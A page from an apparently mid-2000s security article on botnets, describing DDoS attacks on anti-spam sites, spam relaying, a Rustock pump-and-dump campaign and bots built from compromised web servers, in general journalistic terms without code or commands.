The Collective Power of BOTS
Stealth and self-preservation are characteristic of many types of malicious software; however, no malware is as prominent on the current threat landscape as bots.

A massive DDoS attack on the CastleCops Web site earlier this year demonstrated their power. A community of antimalware and antispam activists, CastleCops reported that the traffic directed at its Web site by the attacker's bots peaked at almost 1 Gbps. The flood inundated CastleCops' Internet pipe, making the Web site largely inaccessible for several days. The situation was reminiscent of DDoS attacks on spam-fighting sites Spamhaus, Spamnation and Blue Security; Blue Security ultimately could not withstand the sustained attack and closed down for good.

Such assaults demonstrate that attackers are becoming more aggressive at defending their spam- and malware-driven business models by punishing organizations and individuals they consider threats. Bots are a powerful weapon attackers can use for this purpose, providing attackers with the ability to command thousands of infected computers with a few keystrokes.

Being able to launch DDoS attacks allows the owner of the bot network (botnet) to discipline adversaries, extort money under the threat of such an attack, and offer attack services to others. One case of "DDoS for hire," documented by the FBI, involved the arrest of an owner of a sports apparel company on charges of hiring an attacker to disable the competitors' Web sites.

Sending spam messages is another common reason for employing a botnet. The spammer uses infected computers as spam relays, which provides him or her with virtually unlimit...

Joe Stewart, a senior security researcher with managed security provider Secure-Works, in January analyzed a spam-related botnet powered by the Rustock Trojan that appeared to manipulate the price of a penny stock. The so-called pump-and-dump technique involved the attacker purchasing stock of a little-known company, hyping it up via spam messages and selling it as soon as it slightly increased in price. The technique can be surprisingly effective, earning a spammer as much as $20,000 over a weekend. Stewart's Web site was subsequently targeted by a DDoS attack the day after a newspaper described his analysis of the campaign.

Bot herders have been targeting desktop PCs of broadband users, using the infected computers as unwitting participants in a botnet, but this trend may be changing. Researchers at security assessment specialist Beyond Security--Gadi Evron, Kfir Damari and Noam Rathaus--this year observed an increase in the use of Web servers to construct botnets.

Server-focused bot herders exploit vulnerabilities in Web applications that are built using languages such as ASP, Perl and PHP to invoke their own scripts. Tynan Wilke, a SecureWorks researcher, documented one such campaign. In this attack, the bot herder used Google to locate servers with a vulnerable open-source Horde Webmail application and took advantage of the vulnerability to install a malicious Perl script. The bot allowed the attacker to launch DoS attacks, query Google for further propagation, and execute commands on the compromised Web server, according to Wilke.

< PREV PAGE   |   1  |   2  |   3  |   4  |   5  |   6  |   NEXT PAGE  >